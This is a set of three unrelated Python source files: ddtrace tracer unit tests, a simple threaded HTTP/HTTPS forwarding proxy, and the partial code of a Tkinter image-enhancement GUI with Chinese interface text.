s1 = tracer.trace("1-2")
s1.finish()
assert s1.parent_id is None
class TestPartialFlush(TracerTestCase):
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="5")
)
def test_partial_flush(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 5
assert [s.name for s in traces[0]] == ["child0", "child1", "child2", "child3", "child4"]
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="1")
)
def test_partial_flush_too_many(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 5
for t in traces:
assert len(t) == 1
assert [t[0].name for t in traces] == ["child0", "child1", "child2", "child3", "child4"]
for t in traces:
assert t[0].parent_id == root.span_id
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert traces[0][0].name == "root"
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="true", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_too_few(self):
root = self.tracer.trace("root")
for i in range(5):
self.tracer.trace("child%s" % i).finish()
traces = self.pop_traces()
assert len(traces) == 0
root.finish()
traces = self.pop_traces()
assert len(traces) == 1
assert [s.name for s in traces[0]] == ["root", "child0", "child1", "child2", "child3", "child4"]
def test_partial_flush_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_partial_flush_too_many_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=1)
self.test_partial_flush_too_many()
def test_partial_flush_too_few_configure(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=6)
self.test_partial_flush_too_few()
@TracerTestCase.run_in_subprocess(
env_overrides=dict(DD_TRACER_PARTIAL_FLUSH_ENABLED="false", DD_TRACER_PARTIAL_FLUSH_MIN_SPANS="6")
)
def test_partial_flush_configure_precedence(self):
self.tracer.configure(partial_flush_enabled=True, partial_flush_min_spans=5)
self.test_partial_flush()
def test_unicode_config_vals():
t = ddtrace.Tracer()
with override_global_config(dict(version=u"😇", env=u"😇")):
with t.trace("1"):
pass
t.shutdown()
def test_ctx(tracer, test_spans):
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test3") as s3:
assert tracer.current_span() == s3
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s3.span_id
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s2.span_id
with tracer.trace("test4") as s4:
assert tracer.current_span() == s4
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s4.span_id
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert s1.parent_id is None
assert s2.parent_id == s1.span_id
assert s3.parent_id == s2.span_id
assert s4.parent_id == s1.span_id
assert s1.trace_id == s2.trace_id == s3.trace_id == s4.trace_id
assert s1.metrics[SAMPLING_PRIORITY_KEY] == 1
assert SAMPLING_PRIORITY_KEY not in s2.metrics
assert ORIGIN_KEY not in s1.meta
t = test_spans.pop_traces()
assert len(t) == 1
assert len(t[0]) == 4
_s1, _s2, _s3, _s4 = t[0]
assert s1 == _s1
assert s2 == _s2
assert s3 == _s3
assert s4 == _s4
with tracer.trace("s") as s:
assert s.parent_id is None
assert s.trace_id != s1.trace_id
def test_multithreaded(tracer, test_spans):
def target():
with tracer.trace("s1"):
with tracer.trace("s2"):
pass
with tracer.trace("s3"):
pass
for i in range(1000):
ts = [threading.Thread(target=target) for _ in range(10)]
for t in ts:
t.start()
for t in ts:
t.join()
traces = test_spans.pop_traces()
assert len(traces) == 10
for trace in traces:
assert len(trace) == 3
def test_ctx_distributed(tracer, test_spans):
# Test activating an invalid context.
ctx = Context(span_id=None, trace_id=None)
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
with tracer.trace("test") as s1:
assert tracer.current_span() == s1
assert tracer.current_root_span() == s1
assert tracer.current_trace_context().trace_id == s1.trace_id
assert tracer.current_trace_context().span_id == s1.span_id
assert s1.parent_id is None
trace = test_spans.pop_traces()
assert len(trace) == 1
# Test activating a valid context.
ctx = Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
tracer.context_provider.activate(ctx)
assert tracer.current_span() is None
assert (
tracer.current_trace_context()
== tracer.context_provider.active()
== Context(span_id=1234, trace_id=4321, sampling_priority=2, dd_origin="somewhere")
)
with tracer.trace("test2") as s2:
assert tracer.current_span() == s2
assert tracer.current_root_span() == s2
assert tracer.current_trace_context().trace_id == s2.trace_id == 4321
assert tracer.current_trace_context().span_id == s2.span_id
assert s2.parent_id == 1234
trace = test_spans.pop_traces()
assert len(trace) == 1
assert s2.metrics[SAMPLING_PRIORITY_KEY] == 2
assert s2.meta[ORIGIN_KEY] == "somewhere"
def test_manual_keep(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_KEEP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_KEEP
def test_manual_keep_then_drop(tracer, test_spans):
# Test changing the value before finish.
with tracer.trace("asdf") as root:
with tracer.trace("child") as child:
child.set_tag(MANUAL_KEEP_KEY)
root.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
def test_manual_drop(tracer, test_spans):
# On a root span
with tracer.trace("asdf") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
# On a child span
with tracer.trace("asdf"):
with tracer.trace("child") as s:
s.set_tag(MANUAL_DROP_KEY)
spans = test_spans.pop()
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] is priority.USER_REJECT
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_enabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=True)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) == "test-hostname"
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_disabled(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
@mock.patch("ddtrace.internal.hostname.get_hostname")
def test_get_report_hostname_default(get_hostname, tracer, test_spans):
get_hostname.return_value = "test-hostname"
with override_global_config(dict(report_hostname=False)):
with tracer.trace("span"):
with tracer.trace("child"):
pass
spans = test_spans.pop()
root = spans[0]
child = spans[1]
assert root.get_tag(HOSTNAME_KEY) is None
assert child.get_tag(HOSTNAME_KEY) is None
def test_non_active_span(tracer, test_spans):
with tracer.start_span("test", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 1
with tracer.start_span("test1", activate=False):
with tracer.start_span("test2", activate=False):
assert tracer.current_span() is None
assert tracer.current_root_span() is None
assert tracer.current_span() is None
assert tracer.current_root_span() is None
traces = test_spans.pop_traces()
assert len(traces) == 2
with tracer.start_span("active", activate=True) as active:
with tracer.start_span("non active", child_of=active, activate=False):
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
assert tracer.context_provider.active() is active
assert tracer.current_root_span() is active
traces = test_spans.pop_traces()
assert len(traces) == 1
assert len(traces[0]) == 2
def test_service_mapping():
@contextlib.contextmanager
def override_service_mapping(service_mapping):
with override_env(dict(DD_SERVICE_MAPPING=service_mapping)):
assert ddtrace.config.service_mapping == {}
ddtrace.config.service_mapping = Config().service_mapping
yield
ddtrace.config.service_mapping = {}
# Test single mapping
with override_service_mapping("foo:bar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "bar"
# Test multiple mappings
with override_service_mapping("foo:bar,sna:fu"), ddtrace.Tracer().trace("renaming", service="sna") as span:
assert span.service == "fu"
# Test colliding mappings
with override_service_mapping("foo:bar,foo:foobar"), ddtrace.Tracer().trace("renaming", service="foo") as span:
assert span.service == "foobar"
# Test invalid service mapping
with override_service_mapping("foo;bar,sna:fu"):
with ddtrace.Tracer().trace("passthru", service="foo") as _:
assert _.service == "foo"
with ddtrace.Tracer().trace("renaming", "sna") as _:
assert _.service == "fu"
def test_configure_url_partial():
tracer = ddtrace.Tracer()
tracer.configure(hostname="abc")
assert tracer.writer.agent_url == "http://abc:8126"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer = ddtrace.Tracer(url="http://abc")
assert tracer.writer.agent_url == "http://abc"
tracer.configure(port=123)
assert tracer.writer.agent_url == "http://abc:123"
tracer.configure(port=431)
assert tracer.writer.agent_url == "http://abc:431"
def test_bad_agent_url(monkeypatch):
with pytest.raises(ValueError):
Tracer(url="bad://localhost:8126")
monkeypatch.setenv("DD_TRACE_AGENT_URL", "bad://localhost:1234")
with pytest.raises(ValueError) as e:
Tracer()
assert (
str(e.value)
== "Unsupported protocol 'bad' in Agent URL 'bad://localhost:1234'. Must be one of: http, https, unix"
)
monkeypatch.setenv("DD_TRACE_AGENT_URL", "unix://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid file path in Agent URL 'unix://'"
monkeypatch.setenv("DD_TRACE_AGENT_URL", "http://")
with pytest.raises(ValueError) as e:
Tracer()
assert str(e.value) == "Invalid hostname in Agent URL 'http://'"
def test_context_priority(tracer, test_spans):
"""Assigning a sampling_priority should not affect if the trace is sent to the agent"""
for p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP, None, 999]:
with tracer.trace("span_%s" % p) as span:
span.context.sampling_priority = p
# Spans should always be written regardless of sampling priority since
# the agent needs to know the sampling decision.
spans = test_spans.pop()
assert len(spans) == 1, "trace should be sampled"
if p in [priority.USER_REJECT, priority.AUTO_REJECT, priority.AUTO_KEEP, priority.USER_KEEP]:
assert spans[0].metrics[SAMPLING_PRIORITY_KEY] == p
def test_spans_sampled_out(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
spans = test_spans.pop()
assert len(spans) == 0
def test_spans_sampled_one(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = False
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_spans_sampled_all(tracer, test_spans):
with tracer.trace("root") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
with tracer.trace("child") as span:
span.sampled = True
spans = test_spans.pop()
assert len(spans) == 3
def test_closing_other_context_spans_single_span(tracer, test_spans):
"""
Ensure that a span created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
span = tracer.trace("main thread")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is None
spans = test_spans.pop()
assert len(spans) == 1
def test_closing_other_context_spans_multi_spans(tracer, test_spans):
"""
Ensure that spans created in one thread can be finished in another without
breaking the active span management.
"""
def _target(span):
assert tracer.current_span() is None
span.finish()
assert tracer.current_span() is None
root = tracer.trace("root span")
span = tracer.trace("child span")
assert tracer.current_span() is span
t1 = threading.Thread(target=_target, args=(span,))
t1.start()
t1.join()
assert tracer.current_span() is root
root.finish()
spans = test_spans.pop()
assert len(spans) == 2
def test_fork_manual_span_same_context(tracer):
span = tracer.trace("test")
pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
# No more current span strong reference to avoid memory leaks.
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
def test_fork_manual_span_different_contexts(tracer):
span = tracer.start_span("test")
pid = os.fork()
if pid == 0:
child = tracer.start_span("child", child_of=span)
assert child.parent_id == span.span_id
assert child._parent is None
assert tracer.current_span() is None
child.finish()
os._exit(12)
span.finish()
_, status = os.waitpid(pid, 0)
exit_code = os.WEXITSTATUS(status)
assert exit_code == 12
|
ProxyServer.py
|
import socket
from threading import Thread
from RequestParser import RequestParser
CONNECTION_RESPONSE = "HTTP/1.0 200 Connection established\r\n\r\n"
class ProxyServer:
def __init__(self):
self.listening_socket = None
self.buf_length = 8192
def run_server(self, ip="0.0.0.0", port=5000):
self.listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listening_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.listening_socket.bind((ip, port))
except socket.error:
print("Unable to bind socket on {}:{}".format(ip, port))
self.listening_socket.close()
exit(2)
self.listening_socket.listen(20)
print(f"Listening on {ip}:{port}")
while True:
client, addr = self.listening_socket.accept()
print(f"Accept connection from {addr[0]}:{addr[1]}")
Thread(target=self.handle_request, args=(client,)).start()
def handle_request(self, client):
data_from_client = client.recv(self.buf_length)
request = RequestParser.parse_request(data_from_client)
self.choose_messaging_handler(request, client)
def choose_messaging_handler(self, request, client):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server_socket.connect((request["host"], request["port"]))
except socket.error:
print(f'Could not connect to {request["host"]}:{request["port"]}')
client.close()
server_socket.close()
return
if "CONNECT" in request["meta"]:
self.run_https_messaging(request, client, server_socket)
else:
self.run_http_handle(request, client, server_socket)
def run_http_handle(self, request, client, server_socket):
server_socket.sendall(request["orig_data"])
while True:
response = server_socket.recv(self.buf_length)
if not response:
break
client.sendall(response)
server_socket.close()
client.close()
def run_https_messaging(self, request, client, server_socket):
client.sendall(CONNECTION_RESPONSE.encode())
client.setblocking(False)
server_socket.setblocking(False)
# Forwarding messages from client to server and vice-versa
while True:
try:
data = client.recv(self.buf_length)
if not data:
print("Data from client is empty (In connection with {}:{})"
.format(request["host"], request["port"]))
break
server_socket.sendall(data)
except socket.error:
pass
try:
response = server_socket.recv(self.buf_length)
if not response:
print("Data from server is empty (Address: {}:{})"
.format(request["host"], request["port"]))
break
client.sendall(response)
except socket.error:
pass
server_socket.close()
client.close()
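# Usage sketch (not part of the original file): start the proxy on a local port.
# The ip/port values below are illustrative assumptions.
if __name__ == "__main__":
    ProxyServer().run_server(ip="127.0.0.1", port=8080)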
|
app.py
|
#!/usr/bin/env python3
import sys
import cv2
import glob
import logging
import numpy as np
import tkinter as tk
import tkinter.messagebox as pop_msg
import os
from tkinter import ttk
import tkinter.filedialog as filedialog
from PIL import Image, ImageTk
import threading as td
import subprocess
from threading import RLock
from PIL.ImageTk import PhotoImage
from enhancer import Enhancer
# Uncomment the following line if you want to run it on CPU only.
# os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
class APP(tk.Tk):
def __init__(self):
super().__init__(className='fantasticFilter')
''' ========== Locks ========== '''
self.resize_lock = td.Lock()
self.resizing = False
''' ======= Tk widgets ======== '''
self.style = ttk.Style()
self.frame_main_left = None
self.frame_main_center = None
self.frame_main_right = None
self.show_origin_btn = None
self.show_enhanced_btn = None
self.canvas: ResizingCanvas = None
self.enhance_pb = None
self.start_enhance_btn = None
self.input_resize_height = None
self.input_resize_width = None
''' ========= Tk flags ======== '''
self._model_path_obj = tk.StringVar(self)
self.main_right_model_label = tk.StringVar(self)
self.main_right_model_label.set("使用模型:<無>")
self._vignette_scale = 1
self._vignette_should_update = False
self._vignette_lock = RLock()
''' ======== neuronal ========= '''
self._model = Enhancer()
''' ===== internal flags ====== '''
self._model_loaded = self._model.model_available
self._image_loaded = lambda: self._main_image_origin is not None
self.status_text = tk.StringVar(self)
self.resize_width = tk.StringVar(self)
self.resize_width.trace("w", self._resize_width_listener)
self.resize_height = tk.StringVar(self)
self.resize_height.trace("w", self._resize_height_listener)
self.status_text.set("就緒")
''' ===== np array images ===== '''
self._main_image_origin = None
self._main_image_current_clean = None
self._main_image_enhanced = None
''' ========== theme ========== '''
try:
from ttkthemes import ThemedStyle
style = ThemedStyle(self)
style.set_theme("arc")
except ImportError as e:
class ThemedStyle:
pass
''' ====== configuration ====== '''
self.model_dir = resource_path("pretrained/")
self.vignette_handler()
def _show_origin_listener(self, *args):
if not (self._check_image()): return
image = Image.fromarray(np.asarray(self._main_image_origin))
self.canvas.set_main_image(image)
self.show_origin_btn.config(state="disabled")
self.show_enhanced_btn.config(state="normal")
def _show_enhanced_listener(self, *args):
if not (self._check_image()): return
if self._main_image_enhanced is None:
pop_msg.showinfo("Umm...", "請先增強圖片")
return
image = Image.fromarray(np.asarray(self._main_image_enhanced))
self.canvas.set_main_image(image)
self.canvas.request_update()
self.show_enhanced_btn.config(state="disabled")
self.show_origin_btn.config(state="normal")
def enhance_listener(self, *args):
if not (self._check_image() and self._check_model()): return
thread = td.Thread(target=self._enhance_task)
self.status_text.set("增強圖片中..")
self.enhance_pb.start()
try:
self.start_enhance_btn.config(state="disabled")
self.config(cursor='wait')
except Exception as e:
logging.warning(str(e))
thread.start()
self._enhance_handler(thread)
def _resize_height_listener(self, *args):
if not self._check_image(): return
with self.resize_lock:
if self.resizing:
return
self.resizing = True
origin_height, origin_width, _ = np.shape(self._main_image_origin)
resize_height = 0 if not self.resize_height.get() else int(self.resize_height.get())
ratio = resize_height / origin_height
new_width = int(origin_width * ratio)
self.resize_width.set(new_width)
with self.resize_lock:
self.resizing = False
def _resize_width_listener(self, *args):
if not self._check_image(): return
with self.resize_lock:
if self.resizing: return
self.resizing = True
origin_height, origin_width, _ = np.shape(self._main_image_origin)
resize_width = 0 if not self.resize_width.get() else int(self.resize_width.get())
ratio = resize_width / origin_width
new_height = int(origin_height * ratio)
self.resize_height.set(new_height)
with self.resize_lock:
self.resizing = False
def _enhance_task(self):
new_height = int(self.resize_height.get())
new_width = int(self.resize_width.get())
        new_height = new_height if new_height != 0 else 1
        new_width = new_width if new_width != 0 else 1
resize_image = cv2.resize(self._main_image_origin, dsize=(new_width, new_height))
resize_image = resize_image[new_height % 8:, new_width % 8:, :]
enhance_result = self._model.sample(resize_image, denoise=False)
if enhance_result is not None:
self._main_image_enhanced = enhance_result
self._main_image_current_clean = self._main_image_enhanced
def _enhance_handler(self, thread: td.Thread):
if thread.is_alive():
self.after(100, lambda: self._enhance_handler(thread))
else:
self.enhance_pb.stop()
self.start_enhance_btn.config(state="normal")
self.config(cursor='')
if self._model.success:
self.show_enhanced_btn.config(state="disabled")
self.show_origin_btn.config(state="normal")
image = Image.fromarray(np.asarray(self._main_image_enhanced))
self.canvas.set_main_image(image)
self.canvas.request_update()
self.status_text.set("處理完成!")
try:
subprocess.check_output(["notify-send", "圖片處理完成!", "<b>幻想濾鏡™</b>處理好圖片囉!", "--icon=face-glasses"])
except:
logging.warning("can't send notification.")
self.after(3000, lambda: self.status_text.set("就緒"))
else:
pop_msg.showerror("Something went wrong.. ", "圖片處理失敗!\n多數失敗是由於圖片太大張了,把圖片縮小點試試~")
pop_msg.showerror("Something went wrong.. ", self._model.error_log)
self.status_text.set("處理失敗!")
try:
subprocess.check_output(["notify-send", "圖片處理失敗!", "<b>幻想濾鏡™</b>圖片處理失敗了QQ", "--icon=face-sad"])
except:
logging.warning("can't send notification.")
self.after(3000, lambda: self.status_text.set("就緒"))
def open_image_listener(self, *args):
try:
# for Linux
filename = subprocess.check_output(['zenity', '--file-selection']).decode("utf-8").strip()
except FileNotFoundError:
filename = filedialog.askopenfilename()
except subprocess.CalledProcessError:
filename = False
if not filename:
return False
try:
logging.info("open image:", filename)
image = Image.open(filename)
self._main_image_origin = np.asarray(image)
self.canvas.set_main_image(image)
self.canvas.image = image
self._main_image_current_clean = self._main_image_origin
self.canvas.request_update()
self.resize_height.set(image.height)
self.resize_width.set(image.width)
except IOError as e:
logging.error("open image failed!")
logging.error(str(e))
return False
def select_model_listener(self, *kwargs):
model_name = self._model_path_obj.get()
model_path = self._get_model_path(model_name)
self.main_right_model_label.set("使用模型:" + model_name)
if not os.path.isfile(model_path):
model_path = filedialog.askopenfilename(filetypes=(("pre-trained _model", "*.pb"), ("all files", "*.*")))
if not os.path.isfile(model_path):
return False
t_init_model = td.Thread(target=self.init_model, args=(model_path,))
t_init_model.start()
waiting_win = tk.Toplevel(self)
waiting_frame = ttk.Frame(waiting_win)
waiting_frame.pack(fill='both', expand=True, side='top')
waiting_win.lift(aboveThis=self)
waiting_win.geometry("300x130")
waiting_win.resizable(0, 0)
waiting_win.transient(self)
waiting_win.grab_set()
waiting_win.protocol("WM_DELETE_WINDOW", lambda: None)
waiting_win.wm_title("Loading Pre-trained Model")
ttk.Label(waiting_frame, text="\nloading '" + model_name + "' ... \nThis won't take long.\n\n").pack(side='top')
waiting_win.pb = ttk.Progressbar(waiting_frame, length=200, mode="indeterminate", orient=tk.HORIZONTAL)
waiting_win.pb.pack(pady=5)
waiting_win.pb.start()
self.load_model_waiting_win(waiting_win, t_init_model)
def load_model_waiting_win(self, waiting_win: tk.Toplevel, load_thread: td.Thread):
if load_thread.is_alive():
waiting_win.after(100, lambda: self.load_model_waiting_win(waiting_win, load_thread))
else:
waiting_win.pb.stop()
waiting_win.destroy()
def init_model(self, path: str):
try:
self._model.load_model(model_path=path)
except Exception as e:
pop_msg.showerror("Something went wrong.. ", "無法載入模型!")
logging.error(str(e))
def vignette_listener(self, value):
self._vignette_scale = 2. - float(value)
with self._vignette_lock:
self._vignette_should_update = True
def vignette_handler(self):
with self._vignette_lock:
if self._vignette_should_update:
logging.info("update vignette")
if not self._check_image():
return False
else:
if self._vignette_scale >= 1.99:
result_image = self._main_image_current_clean
else:
image = self._main_image_current_clean.copy()
result_image = self.vignette(image, scale=self._vignette_scale)
result_image_pil = Image.fromarray(result_image)
self.canvas.set_main_image(result_image_pil)
self._vignette_should_update = False
self.after(24, self.vignette_handler)
def save(self, *args):
if not self._check_image():
return
path = filedialog.asksaveasfilename(initialfile='enhanced', defaultextension='.png',
filetypes=[("PNG Images", "*.png"), ("JPEG Files", "*.jpg")])
if path:
image = self.canvas.main_image
image.save(path)
def run(self):
'''
try:
# self.call('wm', 'iconphoto', self._w, ImageTk.PhotoImage(Image.open(resource_path('appicon.png'))))
self.iconbitmap(resource_path('appicon.ico'))
except:
pass
'''
self.title("Fantastic Filter")
self.geometry("%dx%d+50+40" % (800, 500))
"""
menu_bar = tk.Menu(self, background='#aaa')
menu_file = tk.Menu(menu_bar, tearoff=0)
menu_edit = tk.Menu(menu_bar, tearoff=0)
menu_help = tk.Menu(menu_bar, tearoff=0)
menu_bar.add_cascade(label='檔案', menu=menu_file)
menu_bar.add_cascade(label='編輯', menu=menu_edit)
menu_bar.add_cascade(label='說明', menu=menu_help)
''' Menu-File '''
menu_file.add_command(label='開啟影像', command=self.open_image_listener)
menu_file.add_command(label='離開', command=self.quit)
''' Menu-Edit '''
# TODO: add menu-edit items
''' Menu-Help '''
menu_help.add_command(label='致謝')
"""
''' toolbar '''
frame_toolbar = ttk.Frame(self)
frame_toolbar.pack(fill='x')
open_image_btn = ttk.Button(frame_toolbar, text="開啟圖片", command=self.open_image_listener)
open_image_btn.pack(side='left', padx=5, pady=8)
select_model_label = ttk.Label(frame_toolbar, text="請選擇模型:")
select_model_label.pack(side='left', padx=(10, 0))
        model_cbb = ttk.Combobox(frame_toolbar, textvariable=self._model_path_obj) # initialise the model combobox
model_cbb.pack(side='left')
model_cbb["values"] = ['請選擇模型'] + list(map(self._get_model_name, self._get_model_list())) + ['選擇其他模型..']
if len(model_cbb["values"]) > 0:
            model_cbb.current(0) # select the first entry
        model_cbb.bind("<<ComboboxSelected>>", self.select_model_listener) # bind event (fires when a combobox item is selected)
self.show_origin_btn = ttk.Button(frame_toolbar, text="檢視原圖", command=self._show_origin_listener)
self.show_enhanced_btn = ttk.Button(frame_toolbar, text="檢視增強後", command=self._show_enhanced_listener)
self.show_origin_btn.pack(side='left', padx=(10, 0))
self.show_enhanced_btn.pack(side='left', padx=(0, 10))
''' main area '''
        # split into 3 parts: | load model, image... | image preview | edit... save |
frame_main = ttk.Frame(self)
frame_main.pack(fill='both', expand=True, side='bottom')
'''
self.frame_main_left = ttk.Frame(frame_main)
self.frame_main_left.grid(row=0, column=0, sticky="nsew")
'''
self.frame_main_center = ttk.Frame(frame_main, width=600)
self.frame_main_center.grid(row=0, column=0, sticky='news')
bg = self.style.lookup('TFrame', 'background')
bg = "#e7e7e7" if bg == 'systemWindowBody' else bg
self.canvas = ResizingCanvas(self.frame_main_center, bg=bg, bd=0, highlightthickness=0, relief='ridge')
self.canvas.pack(fill='both', expand=True, pady=10, padx=10)
self.frame_main_right = ttk.Frame(frame_main, width=200)
self.frame_main_right.grid(row=0, column=1, sticky='news', padx=20, pady=20)
frame_fantastic = ttk.Frame(self.frame_main_right)
frame_fantastic.pack(fill='x')
ttk.Label(frame_fantastic, textvariable=self.main_right_model_label).pack(fill='x', pady=5)
self.start_enhance_btn = ttk.Button(frame_fantastic, text="開始處理", command=self.enhance_listener)
self.start_enhance_btn.pack(fill='x', expand=True)
self.enhance_pb = ttk.Progressbar(frame_fantastic, length=160, mode="indeterminate", orient=tk.HORIZONTAL)
self.enhance_pb.pack(fill='x', pady=5)
ttk.Separator(self.frame_main_right, orient='horizontal').pack(fill='x', pady=10)
frame_resize = ttk.Frame(self.frame_main_right)
frame_resize.pack()
ttk.Label(frame_resize, text="寬/高").pack(fill='x')
frame_resize_inputs = ttk.Frame(frame_resize)
frame_resize_inputs.pack()
self.input_resize_height = ttk.Entry(frame_resize_inputs, textvariable=self.resize_height, validate='key',
validatecommand=(self.register(isnumeric_or_blank), "%P"), width=9)
self.input_resize_width = ttk.Entry(frame_resize_inputs, textvariable=self.resize_width, validate='key',
validatecommand=(self.register(isnumeric_or_blank), "%P"), width=9)
self.input_resize_width.pack(side='left', padx=(0, 4))
self.input_resize_height.pack(side='right', padx=(4, 0))
ttk.Separator(self.frame_main_right, orient='horizontal').pack(fill='x', pady=10)
frame_controls_vignette = ttk.Frame(self.frame_main_right)
# frame_controls_vignette.pack(fill='x')
controls_vignette_label = ttk.Label(frame_controls_vignette, text='暈影')
controls_vignette_label.pack(fill='x')
controls_vignette_scale = ttk.Scale(frame_controls_vignette, length=160, command=self.vignette_listener)
controls_vignette_scale.pack(fill='x', ipadx=5)
# ttk.Separator(self.frame_main_right, orient='horizontal').pack(fill='x', pady=10)
frame_save = ttk.Frame(self.frame_main_right)
frame_save.pack(fill='x', pady=10)
ttk.Button(frame_save, text='儲存', command=self.save).pack(fill='x', expand=True)
tk.Grid.rowconfigure(frame_main, 0, weight=1)
tk.Grid.columnconfigure(frame_main, 0, weight=1)
self.style.configure('gary.TFrame', background="#eaeaea")
self.style.configure('gary.TLabel', background="#eaeaea")
frame_status = ttk.Frame(frame_main, style='gary.TFrame')
frame_status.grid(row=2, column=0, columnspan=2, sticky="nwes")
status_bar = ttk.Label(frame_status, textvariable=self.status_text, style='gary.TLabel')
status_bar.pack(side='left', padx=5, pady=0)
# self.config(menu=menu_bar)
self.bind_all("<Command-o>", self.open_image_listener)
self.bind_all("<Control-o>", self.open_image_listener)
self.bind_all("<Command-s>", self.save)
self.bind_all("<Control-s>", self.save)
self.mainloop()
@staticmethod
def vignette(image, scale):
        # image.shape is (rows, cols, channels); build a centred Gaussian mask
        height, width = image.shape[:2]
        ys = np.arange(height)
        xs = np.arange(width)
        distance_squared = (ys - height / 2.0)[..., np.newaxis] ** 2 + (xs - width / 2.0) ** 2
        sigma_squared = (height / 2.0) ** 2 + (width / 2.0) ** 2
        sigma_squared /= 2
        mask = np.exp(-distance_squared / sigma_squared)
        # the easiest way to control the strength of the mask
scale_revers = 1 / scale
new_h = int(mask.shape[0] * scale_revers)
new_w = int(mask.shape[1] * scale_revers)
y_start = int((mask.shape[0] - new_h) / 2)
x_start = int((mask.shape[1] - new_w) / 2)
        # take a centred crop of the mask, then stretch it back to the full size
        mask_new = mask.copy()[y_start:y_start + new_h, x_start:x_start + new_w]
mask_new = cv2.resize(mask_new, (mask.shape[1], mask.shape[0]))
result = image * mask_new[..., np.newaxis]
return np.uint8(result)
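    # Illustrative example (comment only, not executed): applying the mask to a
    # random RGB image; the shape and scale below are arbitrary assumptions.
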